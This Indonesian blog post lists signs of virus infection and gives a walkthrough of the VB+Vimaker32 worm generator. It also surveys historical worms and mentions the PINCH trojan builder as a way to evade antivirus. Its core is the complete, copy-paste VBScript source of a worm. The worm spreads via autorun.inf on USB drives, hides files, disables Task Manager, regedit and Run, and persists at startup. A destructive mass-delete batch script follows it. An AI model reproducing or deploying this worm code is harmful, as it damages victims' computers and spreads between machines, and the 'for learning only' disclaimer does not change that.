fachrur's blog...

Berikut salah satu ciri-ciri Komputer Yang Terjangkit Virus :

1. Komputer Anda berjalan lebih lambat dari biasanya.
2. Menu Run, Search disembunyikan oleh virus.
3. CTRL+ALT+DEL tidak bisa digunakan.
4. Regedit dan MSCONFIG di disabled
5. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus.



6. Menu Tools -> Folder Options di Windows EXplorer hilang.
7. Komputer sering berhenti atau tidak merespon.
8. Komputer tiba-tiba restart atau crash dan ini terjadi beberapa menit sekali.
9. Aplikasi komputer tidak berjalan dengan semestinya dan sering error.
10. Muncul File dengan Icon Folder tetapi mempunyai file type .exe
11. Hardisk atau disk drive tidak bisa diakses.
12. Aktivitas print tidak bekerja dengan semestinya.
13. Sering terjadi pesan error yang aneh dan tidak biasanya.
14. Sering terlihat menu atau dialog box yang rusak.
15. Terdapat Duplikasi nama folder di dalam folder tersebut.
16. Komputer selalu mengeluarkan pesan dari mana virus ini berasal.

Sapa bilang buat virus itu susah...sekarang sudahada tool yang digunakan untuk membuat virus , namanya " VB+Vimaker32 ", binggung?

VB+Vimaker32 itu adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah bahasa Balinya..enggal hehe


Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal. Atau e-mail aj ke sang empunya di: rzwan182@gmail.com.
Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:


1. Segelas kopi yang masih hangat.....
2. Jangan lupa rokok Gudang Garamnya :>
3. jANGAN LUPA siapkan cd Xp, sapa tahu virus yang dibuat menjadi raja dikomputer sendiri (boleh dikatakan tuan dimakan senjata, eh maap senjata makan tuan)

Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gt.

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he…

``Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)

File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker xxx Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini. Dan penulis ucapkan terima kasih kepada jasakom yang telah bersedia mempublish artikel ini.

1.Storm Worm

Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.

2. Leap-A/Oompa- A

Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.



3. Sasser and Netsky

Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 taon 9 bulan, karena umurnya masih di bawah 18 taon.

4. MyDome (Novarg)

Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.

5.SQL Slammer/Saphire

Muncul Januari 2003, nyebar cepet lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash, ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapap penerbangan karena eror check in ama tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.

6.Nimda

Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet, menyebar lewat Internet. Nimda akan ngebuat backdoor ke OS. jadi penyerang bisa akses ke server dan berbuat apa saja Nimda juga menjadi DDoS.

7.Code Red & Code Red II

Muncul musim panas 2001, nyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi ngabisin memori. Paling seru waktu berhubungan ama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.

8.The Klez

Nongol taon 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer ga bisa beroperasi, bisa berhentiin program antivirus.

9.ILOVEYOU

Abis “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.

10.Melissa

Dibikin taon 1999 sama David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis ngirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan.

Macam-macam tipe virus bermunculan saat ini.
Banyak cara sebenarnya untuk membuat sebuah virus. Dari memulai belajar tentang pemrograman untuk mendukung pembuatan virus tersebut, mempelajari hole-hole sebuah operating sistem sampai cara yang terakhir yang paling mudah yaitu menggunakan software yang dirancang khusus untuk membuat virus.



PINCH Merukapan sebuah software yang diciptakan untuk menciptakan virus trojan. Dengan softraware ini kita bisa membuat virus trojan. Tanpa memerlukan modal pengetahuan bahasa pemrograman, bahkan sampai orang awam pun bisa membuatnya. Hanya dengan setingan beberapa option langsung compile…Jadi deh virus tersbut.

Mudahnya lagi tipe-tipe torjan tersebut bisa kita setting da kita ubah-ubah jenisnya. Hal ini bisa dilakukan untuk menghindar dari tangkapan anti-virus .

ingat ini tutorial ini hanya untuk nambah ilmu bukan tuk macem2

Sumpek kena virus...? sama! saya juga! hehe..

Tips kali ini akan membahas pembuatan sebuah virus sederhana yang lengkap dengan pencegahannya. Pada tips kali ini, aplikasi yang digunakan tidak perlu menggunakan software canggih.. cukup dengan menggunakan aplikasi text editor sederhana tapi mumpuni (dalam hal ini, penulis menggunakan aplikasi Notepad bawaan Windows).. he..

Untuk virus, penulis menggunakan contoh coding sederhana sebuah virus lalu penulis lanjut dengan membahas penghapusan virus tersebut melalui command prompt. Semua coding pada tips ini berhasil dibuat melalui aplikasi text editor (notepad) dan bekerja pada Windows XP SP2. Baik coding virus dan coding penghapusan, berjalan dengan sukses tanpa ada aral melintang. Untuk mengembalikan fungsi Windows yang dimatikan oleh coding virus, silahkan gunakan aplikasi utilitas seperti WinBoost atau WinXP Manager (atau keduanya) maupun aplikasi utilitas lainnya karena terlalu banyak manipulasi registry yang dilakukan oleh coding virus ini.. penulis sudah sangat mengantuk untuk membahas pengembalian fitur Windows.. hehe.. mungkin akan dibahas di lain kesempatan.





Penulis dan sumber-sumber penulis tidak bertanggung jawab dan/atau tidak dapat dimintakan pertanggung jawaban atas kerusakan yang timbul sebagai akibat dari penerapan tips ini. Resiko menerapkan tips ini adalah tanggungan pribadi!!



Berikut adalah contoh coding dari virus Rangga-Zay yang coding-nya saya temukan pada sebuah blog. Copy-Paste coding berikut lalu ubah baris yang dicetak tebal atau cetak miring:


‘//–Awal dari coding, Memaksa Windows Untuk Mengabaikan Pesan Error Lalu Lanjut Mengeksekusi Baris Perintah Selanjutnya–//
on error resume next

’//–Dim Kata Kunci Berikut–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,namavirus,nt,check,sd

‘//–Membuat Sebuah File Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe namavirus.ext”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Membuat Sebuah File Induk Virus Pada Folder Windows (contoh: C:\WINDOWS)-//
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- namavirus.ext “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- namavirus.ext”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- namavirus.ext “)
tf.attributes = 39

‘//–Membuat File Autorun Yang Akan Dieksekusi Secara Otomatis–//
‘Menggandakan diri apabila tipe drive adalah 1 dan 2 (removable) termasuk disket
for each flashdrive in fs.drives

‘//–Melakukan Pemeriksaan Tipe Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Perintah Untuk Menyebarkan File Virus Ke Drive Lain Dengan Tipe Drive 1, 2, Atau Dengan Path A:–//
set tf=fs.getfile(flashdrive.path &”\namavirus.ext “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\namavirus.ext “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\namavirus.ext “)
tf.attributes = 39

‘//–Memanggil File Autorun Setup Information Untuk Di Masukkan Ke Dalam File Autorun–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set namavirus = createobject(”WScript.Shell”)

‘//–Menambahkan Pesan Pada Title Bar Internet Explorer–//
namavirus.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Masukkan pesan anda disini “

‘//–Membuat File Dengan Attribut Hidden Tidak Ditampilkan Melalui Windows Explorer–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0?, “REG_DWORD”

‘//–Menghilangkan Menu Find, Folder Options, Run, dan Mematikan Regedit serta Task Manager–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”

‘//–Mematikan Fungsi Klik Kanan–//
namavirus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”

‘//–Memunculkan Pesan Setiap Windows Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Masukkan pesan anda disini.”

‘//–Membuat Windows Untuk Selalu Mengeksekusi Virus Pada Saat Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- namavirus.ext “

‘//–Mengubah Registered Owner Dan Organization–//
namavirus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Masukkan Teks Disini”
namavirus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Masukkan Teks Disini”

‘//–Melakukan Perulangan Fungsi Sleep–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

‘Akhir dari coding


Simpan dengan nama file bebas tapi ekstensinya harus ".VBS"; agar bisa terbaca dan tereksekusi oleh Windows Scripting Host. Caranya File\Save As.... lalu pada bagian "Save as type" pilih “All Files (*.*)" dan masukkan ekstensi file (.vbs)
Klik [Save]



Sekarang, kita akan membuat penghapusan virus tersebut:

Buka aplikasi text editor (Notepad, Wordpad, dll..)
Copy-Paste coding berikut pada text editor anda

echo Anda yakin mau mengeksekusi penghapusan?
PAUSE
del /s /f C:\*.vbs
echo Penghapusan tahap pertama selesai, penghapusan tahap kedua akan dimulai...
PAUSE
del /f /q C:\*.vbs
echo Penghapusan selesai. Silahkan restart komputer anda.
PAUSE
EXIT

Simpan file tersebut dengan nama file bebas tapi ekstensinya harus ".bat"
Jalankan file tersebut dan tunggu hingga selesai
Restart komputer


O iya, path "C:\" bisa diganti dengan path menuju drive apa saja (A-Z) serta ekstensi file bisa diganti sesuai dengan ekstensi virus. Hati-hati ketika mengubah ekstensi penghapusan menjadi ".exe" karena semua file aplikasi pada drive tersebut akan terhapus tanpa kecuali!

Selamat mencoba! Trims.